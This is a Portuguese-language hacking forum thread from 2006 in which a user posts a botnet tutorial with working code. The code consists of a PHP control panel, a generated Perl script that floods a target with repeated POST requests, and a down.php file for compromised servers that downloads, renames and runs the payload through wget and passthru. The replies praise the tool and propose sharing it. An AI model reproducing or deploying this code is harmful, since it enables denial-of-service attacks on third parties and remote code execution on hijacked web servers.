Criando sua própria Botnet v2

Started by HadeS, 29 de June , 2006, 02:10:22 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

HadeS

Pessoal, todos aqui devem ter visto meu tópico falando sobre Botnets, que tinha um script feito em PHP.

Pois bem, dei uma incrementada legal no script, alterei bastante coisa, inclusive o Design, e agora dou uma explicação mais detalhada de como funciona.

Para quem não viu o primeiro post, leia-o aqui: http://www.darkers.com.br/smf/index.php ... 002.0.html

Bem, vou ensinar aqui como você pode fazer uma Botnet de um modo simples e fácil. Vou disponibilizar aqui um script bem simples, feito em PHP, melhorado por mim.

Pra começar, você precisa tem no seu servidor pessoal suporte a rodar PHP, e algumas Shells por aí, com suporte a wget, perl, php, e a função passthru("") do PHP deve estar abilitada.


No seu servidor pessoal deve ter os seguintes arquivos:

index.html:
<html><head><title>Botnet Master - Configurations:</title></head>
<FRAMESET rows="14%,76%,*" frameborder="no" border="0">
<frame src="top.html">
<frame src="center.html">
<frame src="bottom.html">
</frameset>
</html>

top.html:
<html><body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center><b><font color="white" size="6">HadeS :</font> <font color="red" size="6">The Lord of Underground</font><br>
<u>Personal Botnet:</u></center>
</body></html>

bottom.html:
<html>
<body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center>© <a href=http://www.darkers.com.br>Security Darkers</a>
</center>
</body>
</html>

left.html:
<html>
<body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center><b><font color="white" size="4"><u>Exploit Padrão:</font></u></center><br><br>
<form action="create_padrao.php" method="POST">
<b>Servidor:</b><br><input type="text" name="server"><br><br>
<b>Caminho para o arquivo: </b><br><input type="text" name="path"><br><br>
<b>POST string (Use Live HTTP): </b><br><input type="text" name="post"><br><br>
<b>Cookie (Opcional): </b><br><textarea name="cookie" cols="23" rows="3"></textarea><br><br>
<input type="submit" value="Enviar"> <input type="reset" value="Limpar">
</form>
</body>
</html>

right.html:
<html>
<body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center><b><font color="white" size="4"><u>Exploit Personalizado:</font></u></center><br><br>
<form action="create_perso.php" method="POST">
<b>Código Fonte do Exploit:</b><br>
<textarea name="xpl" rows="16" cols="65">Cole aqui o Código Fonte do Exploit desejado.

Lembre-se sempre de inserir um valor para as variáveis.</textarea>
<br><br>
<input type="submit" value="Enviar"> <input type="reset" value="Limpar">
</form>
</body>
</html>

create_padrao.php:
<?php
$myFile 
"file&#46;txt";
unlink($myFile);
$file "file&#46;txt";
$fh fopen($file'w') or die("can't open file");

$server $_POST['server'&#93;;
$path $_POST['path'&#93;;
$post $_POST['post'&#93;;
$cookie $_POST['cookie'&#93;;
$data '#!/usr/bin/perl

use IO&#58;&#58;Socket;

$time= "9999";
$HOST = "'
&#46; $server &#46;'"; #Host Without http&#58;//
$DIR "' &#46; $path &#46; '";   #Path to file

while($i<$time){
$i++;
$FILE "' &#46; $post &#46; '";
$LENGTH length $FILE;

$get1 IO&#58;&#58;Socket&#58;&#58;INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "+";
print $get1 "POST "&#46;$DIR&#46;" HTTP/1&#46;0\n";
print $get1 "Host&#58; "&#46;$HOST&#46;"\n";
print $get1 "Cookie&#58; '&#46; $cookie &#46; ' ";
print 
$get1 "Content-Type&#58; application/x-www-form-urlencoded\n";
print 
$get1 "Content-Length&#58; "&#46;$LENGTH&#46;"\n\n";

print $get1 $FILE;
syswrite STDOUT"+";
}
';

fwrite($fh, $data);
print "Ok, thanks for the data, check your target when you get a load error&#46; If it'
s still up, try again &#58;)&#46;<br><br><b><font color=red>DO NOT CLOSE THIS WINDOW UNTIL THERE'S AN ERROR!!!</b></font>";
?>

<script language="JavaScript">
 window.location="run.php";
</script>

create_perso.php:
<?php
$myFile 
"file&#46;txt";
unlink($myFile);
$file "file&#46;txt";
$fh fopen($file'w') or die("Error&#58; Não foi possível abrir o arquivo file&#46;txt &#46;");

$data $_POST['xpl'&#93;;;

fwrite($fh$data);
?>

<script language="JavaScript">
 window.location="run.php";
</script>

run.php:
<?php
$fopen1 
fopen("http&#58;//www&#46;SITE&#46;com/down&#46;php""r");
$fopen2 fopen("http&#58;//www&#46;SITE&#46;com/down&#46;php""r");
$fopen3 fopen("http&#58;//www&#46;SITE&#46;com/down&#46;php""r");
fclose($fopen1);
fclose($fopen2);
fclose($fopen3);
?>

<script language="JavaScript">
window.alert("Pronto, o exploit terminou de rodar. Provavelmente o server está OFF, chequê-o.");
window.location = "index.html";
</script>

file.txt:
"Esse arquivo deve estar em branco, e com CHMOD 777."

E nos sites invadidos (As Shells), devem ter o seguinte arquivo:

down.php:
<?php
passthru
("wget http&#58;//www&#46;SEU_SITE_PESSOAL&#46;com&#46;br/file&#46;txt");
passthru("mv file&#46;txt secret&#46;pl");
passthru("perl secret&#46;pl");
?>


Agora temos que observar alguns pontos.

Primeiro, caso você escolha a opção "Exploit Padrão", na index.html, você vai inserir algumas informações sobre a vítima, e a página create_padrao.php irá criar um exploit pré-definido. Caso você escolha a opção "Exploit Personalizado", você deverá inserir o código fonte do exploit no campo que existe na página, e esse exploit que será usado. Mas lembre-se, se você escolher a opção "Exploit Personalizado", não se esqueça de atribuir valores válidos às variaveis, pois caso contrário o exploit não irá rodar corretamente.

Segundo, em alguns arquivos você poderá fazer alterações para personalizá-lo de diversas formas, mas alguns você deverá alterá-los de acordo com sua situação. O primeiro é o run.php, você deve alterar a URL "http://www.site.com/down.php" pela URL do zumbi que possue o arquivo down.php instalado. O segundo é o down.php, você deve alterar a URL "http://www.SEU_SITE_PESSOAL.com.br/file.txt" para a URL do seu servidor pessoal (O Master da Botnet), que possue o arquivo file.txt.

Esse script, como qualquer outro, possue pontos positivos e negativos. Os positivos são que ele é muito simples e compacto, qualquer um pode usá-lo, você pode usar sua botnet de qualquer lugar (Só acessar a URL do master), e você não precisa rootar os zumbis para poder instalar algo, é só enviar a página down.php. E os negativos são que pelo Master você não tem acesso total ao sistema dos zumbis, você só pode mandar eles rodarem o exploit, e só tem suporte a exploits em Perl.

Em breve liberarei uma "versão" que permite rodar exploits feitos em PHP, Python, Shell Script, e compilados (C, C++, etc). E quem sabe poderei adicionar uma opção de rodar comandos em massa nos zumbis. Se alguém tiver vontade de fazer isso por sí só, sinta-se a vontade. ;)

Façam bom uso.

HadeS

slul

muito bom!!

se quiser posso montar com você um site que os usuários possam cadastrar shell

e utilizar a botnet oq vc acha?


abraços!

d3rf

Muito bom Hades ...
bem explicao e tudo mais !

HadeS

Boa idéia Slul, mas tem um porém.

O uso vai ser abusivo. Todos vão querer usar sem o menor propósito, e isso pode estragar um trabalho alheio. Sem contar que vamos ter que atualizar constantemente, pois uma Shell que não funcione irá impedir o acesso a todas.

Mas podemos pensar nisso. Podemos fazer um restrito. ;)

HadeS

locator.dll

HadeS mais uma vez de parabéns...

Ponto! Por compartilhar este excelente conteúdo... ;)

vlw

locator.dll

slul

Quote from: "HadeS"Boa idéia Slul, mas tem um porém.

O uso vai ser abusivo. Todos vão querer usar sem o menor propósito, e isso pode estragar um trabalho alheio. Sem contar que vamos ter que atualizar constantemente, pois uma Shell que não funcione irá impedir o acesso a todas.

Mas podemos pensar nisso. Podemos fazer um restrito. :)

entendeu?


E a da conexão nós podiamos fazer uma conexão a socket pra atestar que a página esteja on ou off-line :P

mas tah blz ele merece ;)

HadeS

Eu ainda acho melhor fazer privado. Isso ia dar muita confusão.

KISS. ;)

HadeS

Cloudy

"You have to be trusted by the people tou lied to, so when they turn their back on you, you have the chance to the put the knife in." (Roger Waters)

...by Cloudy

morpheus


morpheus

Tentei efetuar os testes, e me deparei com a necessidade da center